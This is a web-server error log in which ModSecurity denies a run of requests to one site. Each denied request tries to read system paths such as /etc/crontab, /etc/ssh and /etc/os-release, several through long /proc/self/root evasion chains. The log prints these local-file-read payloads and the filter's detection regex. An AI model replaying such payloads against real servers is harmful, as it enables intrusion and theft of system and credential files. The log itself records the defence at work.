[Fri Mar 20 10:36:27.975210 2026] [:error] [pid 10189:tid 140411616036608] [client 57.141.18.109:55602] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1NWzJ3M9BSuKP7CAZDfAAAAI8"]
[Fri Mar 20 10:36:32.051419 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.241.31:34474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NYLninkcc-iUj5Ap-PwAAA5M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:33.420104 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.241.31:50966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NYfqxLDW4GITHUkQKkwAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:36.199223 2026] [:error] [pid 11167:tid 140411699963648] [client 57.141.18.85:56080] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1NZPHIg5MgXLBnicMWzAAAAcU"]
[Fri Mar 20 10:36:39.534502 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.241.31:50976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NZwF0L0L-SsrnPo6KIgAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:45.128086 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.241.31:39712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NbfHIg5MgXLBnicMW0wAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:46.559364 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:39718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NbhCii7xarUs8iHaLagAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:49.979643 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.241.31:35348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NcfXLqtnMIWvjpaK71AAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:52.069707 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:35364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NczJ3M9BSuKP7CAZDpgAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:36:53.327110 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:60066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NdeoXxyEfFpUF8f-hTgAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:36:54.825199 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.241.31:35380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Ndrninkcc-iUj5Ap-UQAAA5Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:00.519352 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.241.31:35384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NfPqxLDW4GITHUkQKtAAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:01.970505 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.241.31:39508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NfTJ3M9BSuKP7CAZDqwAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:03.306644 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.241.31:39518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Nf11pVZ5mVmJwsFNQhAAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:04.615804 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:39520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NgOoXxyEfFpUF8f-hVQAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:11.358416 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:39522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Nh-oXxyEfFpUF8f-hZAAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:12.743611 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.241.31:42698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NiAF0L0L-SsrnPo6KMgAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:14.000245 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.241.31:42714] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NiRCii7xarUs8iHaLeQAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:15.277423 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.241.31:42720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NixCii7xarUs8iHaLegAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:18.793046 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.241.31:42734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NjjJ3M9BSuKP7CAZDtwAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:20.510168 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.47:57736] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1NkPqxLDW4GITHUkQKygAAAQc"]
[Fri Mar 20 10:37:22.127048 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.241.31:50774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Nkrninkcc-iUj5Ap-YwAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:23.444155 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.241.31:50788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1NkxCii7xarUs8iHaLfgAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:37:26.434977 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.241.31:50792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri 